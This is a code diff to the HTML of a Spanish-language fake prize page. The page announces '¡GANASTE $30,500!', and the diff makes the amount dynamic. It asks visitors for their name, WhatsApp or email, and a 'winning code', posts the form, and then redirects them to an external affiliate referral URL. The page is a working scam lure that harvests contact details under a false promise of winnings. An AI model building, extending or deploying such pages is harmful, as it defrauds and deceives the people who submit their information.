--- a/index.html
+++ b/index.html
@@ -29,8 +29,8 @@
 
   <div id="form-section" style="display: none;">
     <h2>¡Felicidades!</h2>
-    <p class="prize-text">
-      ¡GANASTE $30,500!<br>
+    <p class="prize-text" id="prizeMessage">
+      ¡GANASTE $XX,XXX!<br>
       Completa los 3 campos para reclamar tu premio.
     </p>
 
@@ -38,7 +38,7 @@
       <input type="text" name="nombre" placeholder="Nombre Completo" required>
       <input type="text" name="contacto" placeholder="WhatsApp o Email" required>
       <input type="text" name="codigo_ganancia" placeholder="Código de Ganancia" required>
-      <input type="hidden" name="premio" value="Ganaste $30,500">
+      <input type="hidden" name="premio" id="hiddenPrize" value="">
 
       <button type="submit" id="submitBtn">Reclamar Premio</button>
     </form>
@@ -48,7 +48,7 @@
 
   <script src="script.js"></script>
 
-  <!-- Form submission handler with redirect -->
+  <!-- Form submission with redirect -->
   <script>
     document.getElementById('claimForm').addEventListener('submit', function(event) {
       event.preventDefault();
@@ -63,16 +63,13 @@
       fetch(form.action, {
         method: 'POST',
         body: formData,
-        headers: {
-          'Accept': 'application/json'
-        }
+        headers: { 'Accept': 'application/json' }
       })
       .then(response => {
         if (response.ok) {
-          // Redirect after success
           window.location.href = "https://www.latgree.com/?user=27977&ref=44947";
         } else {
-          alert("Error al enviar el formulario. Inténtalo de nuevo.");
+          alert("Error al enviar. Inténtalo de nuevo.");
           submitBtn.disabled = false;
           submitBtn.textContent = "Reclamar Premio";
         }
